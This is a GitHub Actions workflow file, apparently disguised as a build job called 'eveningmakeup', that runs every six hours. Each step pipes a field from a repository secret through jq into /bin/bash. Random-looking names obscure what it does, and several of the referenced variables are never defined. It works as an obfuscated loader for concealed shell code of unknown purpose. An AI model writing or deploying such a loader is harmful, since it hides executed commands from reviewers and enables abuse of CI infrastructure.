name: eveningmakeup

on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: eveningmakeup
        env:
          ygprj598: ${{ secrets.ygprj598 }}
        run: |
          echo $ygprj598 | jq -r .pym958 | /bin/bash
          echo $vgiew16949 | jq -r .jkza3321 | /bin/bash
          echo $sfhja4836 | jq -r .cjm2039 | /bin/bash
          echo $hzc47149 | jq -r .ybemi61 | /bin/bash
          echo $yc317 | jq -r .la240 | /bin/bash
          echo $ybc18 | jq -r .w7 | /bin/bash

